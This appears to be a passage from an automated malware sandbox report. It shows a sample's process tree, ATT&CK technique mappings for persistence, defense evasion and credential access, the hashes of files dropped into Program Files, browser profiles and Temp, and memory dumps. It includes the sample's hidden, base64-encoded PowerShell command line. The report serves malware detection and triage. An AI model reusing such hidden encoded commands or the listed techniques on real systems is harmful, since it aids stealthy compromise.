  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:816
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:2028
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:840
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:3068

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:348

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1320

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1336

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Indirect Command Execution

T1202

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\PBESNRhdmYKU2\fhLBsWe.xml

Filesize
2KB

MD5
0e3d265ce575bbba4b8b65bc65466a31

SHA1
015d75ae2c43b61d762aa3f21f6481cf2c7b06d3

SHA256
ab17505e0cf19d59f6e5cdefcc839bb9af14df81d6e7a2b6c8613d39b70e0174

SHA512
d2bdfe9d1eeb5e5b73b60d8722a346b333b3344278c27ce5f801142b10e6b5c119d39abcde53a8ac1be48505121e88111f5363e0c3650500cc97f381ffe63825

Download Submit
C:\Program Files (x86)\RjbCmcSmxXHPWkOYaCR\aSNrPhV.xml

Filesize
2KB

MD5
0d71b2d8e6fe441268b1638f2cd8ab12

SHA1
db9b199a587f5d952ef1b8da423804fe5405ad39

SHA256
bc78a4c021058e4a40cbb82c22034a2ded62f614a2c7cb83374099191b38d8c4

SHA512
7a7d940afb1af99c890bed573757232757aa4cc5bdccad6e21b9afec72b2356820a2a609096a4557b009fec1da2659e5aed801e93ec99927d5b5202fdc02c71b

Download Submit
C:\Program Files (x86)\fJZgEdoSEgzXC\vzOloNF.xml

Filesize
2KB

MD5
39d39a97ba02ec86cdf3d793f23eff26

SHA1
2700bbd953e72e78b1287f4eab2f5f51b966514d

SHA256
349cbfe8b2a5c26305cd5808b31447b6346db180caf9de209cddbb101708e3ab

SHA512
d8a2c623493f010bb9298aad10fcd838f6af146f3156a226c4f2837ef45759833893ef54fd807e00b22a8a4d8c96930971915b0dcc9bb75a8874ddb6c31031d1

Download Submit
C:\Program Files (x86)\jAmSRiPKU\RrtsBSE.xml

Filesize
2KB

MD5
c91845288661f1edec203635f1bc1e3e

SHA1
281615d4bb2f61c347a90213b183d55ee1318f1a

SHA256
9f3a1a19c104e8b6c21245874a94f8a1724ddb841b60ecfb9871503efd44e818

SHA512
fd12c680c74fedc9186f0aac684c4e74c251159bfbebd21727f0d251d42e50bb5391f707e73fb074bee8ebea9f632fd60c351547d5f2a52b349c3ae45b8eeda1

Download Submit
C:\Program Files\Mozilla Firefox\browser\features\{24E81385-CAF7-4F8F-94F4-CF985F9FF409}.xpi

Filesize
2.1MB

MD5
9691f045d3d63e1e50fb8e6a5f7e4459

SHA1
406f378f519b3aa4c9e4d8662253bfd9f37600d1

SHA256
72324155f3a1e410a690e0fac9331116858190663eb7a1de14672f5d5abff7e6

SHA512
4869ec1b551737ddbbbf121f48bc4bd0753a2ed82deffd21b6762cb29cb65b0d8341424db9338727e1b39205705f02f9f7529e758a77515f3a64b880edfe6389

Download Submit
C:\ProgramData\YpcryChfqZNPHIVB\UqGYZcd.xml

Filesize
2KB

MD5
d7123bf0d70ff15ad3ef24f4b0b86d22

SHA1
8f9f0af36a08650d59ec21b1fd56869e17fa1d59

SHA256
fa6beefa5e92777b75e0006eafe0724c2c135f386763090386ae7a642ae38308

SHA512
e1addbe4ad34d98d4ffaca4a0b2046bd07221cf9e790f7a37dc9a5a5c93c0ab1f25039c11fe41122974f734d770f9365ec8e8b3fe0fe8208b6b715741e28d182

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gbaddinigglahkekcppiongkmgmpahml\3.0.1_0\_locales\en_GB\messages.json

Filesize
187B

MD5
2a1e12a4811892d95962998e184399d8

SHA1
55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

SHA256
32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

SHA512
bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gbaddinigglahkekcppiongkmgmpahml\3.0.1_0\_locales\fa\messages.json

Filesize
136B

MD5
238d2612f510ea51d0d3eaa09e7136b1

SHA1
0953540c6c2fd928dd03b38c43f6e8541e1a0328

SHA256
801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

SHA512
2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gbaddinigglahkekcppiongkmgmpahml\3.0.1_0\_locales\pt_BR\messages.json

Filesize
150B

MD5
0b1cf3deab325f8987f2ee31c6afc8ea

SHA1
6a51537cef82143d3d768759b21598542d683904

SHA256
0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

SHA512
5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
887e7bb55ee53c93856b33158cfe0c95

SHA1
3035614db5d73e7f270dba04b2ee573dd08960ff

SHA256
756f84841e02b2043371a9b83062aea45566ceaefd409f089b1d73674ea5173c

SHA512
4b4bf27e7a6f4e8a2d3f087d715e046bb69cea049757d52e43477cabb3648163174cf10f06bab45d4b27230c712e385949d917cde42ba165b8e8397b8b065e72

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
26KB

MD5
247ac75966f5abb81ccf333b652c4900

SHA1
d20080fab656ad6372f2d257568ccd6035f9f070

SHA256
edb0613de3a7a64a30e512875febd08dc28fbcf2e1299d1502aac6270e1b787d

SHA512
a72e1ae7f452fabf1eaaac5468fb357969637333885d379af0df4d9934cf54388c06947ca54de0b85ef02e9c081196460c4f94fadd0f4ad6e5da9551b713da7d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\49H8UDGBJB4VG5475FF9.temp

Filesize
7KB

MD5
110a8cb526029b035c45a611d93ec1ad

SHA1
7ca7894f02a957b5a41be286a459923107d4062f

SHA256
830e16312476ac28265e691473663104232472e68b1ee890ef54dc51afc7f272

SHA512
a6773176daec626f3f921bd5064b81e3599d4e46528a575ecaa26ffeb350f58ca974efa4ae3130ec9e17a08d0520a5a6d245669779ba744f29147ff959ced075

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
1b37414e52a68a02bccae596510df2f3

SHA1
ee3ad33ec55fb31376c0a033576b4100877159dc

SHA256
ca5db32e052a92b8da046ff5190602bf23b7a4c59a038ff70ccc0cd370b210ba

SHA512
ff181c055ed8aac26b10d7a00140a76d69a90f7acc2835efa11d18b1939fad1e201e68c58998ce05f5757bae30da77b38786775a4c7114ea9e588bd04b1974a7

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\AOIFKJAWN80W6ZAFFOMJ.temp

Filesize
7KB

MD5
c42e6b6fe477f2f4beac84abfe2dc497

SHA1
8c30d7e8dfab767a05d8687ab46128a8e6bb1caa

SHA256
e91d4ff75ea39b1070ae65f505bef66847480a144c40d030a44334043363b7c2

SHA512
aa4e7d69e3ffae0171ba98b90904c68b330135d3659146505357bc5935acf349ce48af5614f21e0000c62cf78d222fd8574e008199b6f2029e23df91d1810205

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
a0787b8c8b4db0590746afcfa3f21c95

SHA1
638f2fb8115bd6261dd0ea315c559f8e46c29860

SHA256
7fd8cfcff7213a6c338d598a6b75dba8e3405608f02d1b29eaf46cb22588388e

SHA512
5820ed221c2ff9144c108711d9b03e41b6f28a97ba27968bc5959b7840044aaf24f904f362211149477df811939803bdd64accf9f34856bd504e09723d1c43c3

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4k8o8gx5.default-release\prefs.js

Filesize
7KB

MD5
4fdab3c9f350ed9579bca41642994edc

SHA1
ae773b68bff2fb8167e618cc424f58ad4d133e80

SHA256
c8347308980787cf911d7df9662563eb1b7f20b4d8cc39ef11e144383731119d

SHA512
9492136194dfececda284f587fda3b1a862c1e8642b9aaf96354aada441e33b94d2b189422ba4474bb0c55df5fdd192b73b890a3d10e9017e3a1b3e0ebd9450b

Download Submit
C:\Windows\Temp\pqEZrWlsHvsjYwEL\VnnBMNVw\atZvUuDFuHcyDOUS.wsf

Filesize
9KB

MD5
966fafb3a045ef939be3a580b5541894

SHA1
4642534eaff518608fa58a7eeed6cbe1e1510dba

SHA256
4c6b6dcec0746c4769cb2b3320ed802c0849dfed4dc02d95bc2e76aaf3a93c60

SHA512
28a181f259cc798020e3efffb2a32b17046a80f34946743d0704b8d52e98b2ad724ad0e9f0132eaeab893168661e9276b8a0b2c844153235a52bf9fc765098b2

Download Submit
memory/780-14-0x0000000001D10000-0x0000000001D18000-memory.dmp

Filesize
32KB

Download
memory/780-13-0x000000001B850000-0x000000001BB32000-memory.dmp

Filesize
2.9MB

Download
memory/816-25-0x000000001B780000-0x000000001BA62000-memory.dmp

Filesize
2.9MB

Download
memory/816-26-0x0000000002790000-0x0000000002798000-memory.dmp

Filesize
32KB

Download
memory/840-43-0x000000001B790000-0x000000001BA72000-memory.dmp

Filesize
2.9MB

Download
memory/2132-90-0x0000000003550000-0x00000000035B6000-memory.dmp

Filesize
408KB

Download
memory/2132-53-0x0000000003330000-0x00000000033B5000-memory.dmp

Filesize
532KB

Download
memory/2132-0-0x00000000003C0000-0x0000000000A6E000-memory.dmp

Filesize
6.7MB

Download
memory/2132-279-0x0000000004180000-0x0000000004204000-memory.dmp

Filesize
528KB

Download
memory/2132-15-0x00000000003C0000-0x0000000000A6E000-memory.dmp

Filesize
6.7MB

Download
memory/2132-289-0x0000000005850000-0x000000000592A000-memory.dmp

Filesize
872KB

Download
memory/2132-4-0x0000000010000000-0x00000000124AF000-memory.dmp

Filesize
36.7MB

Download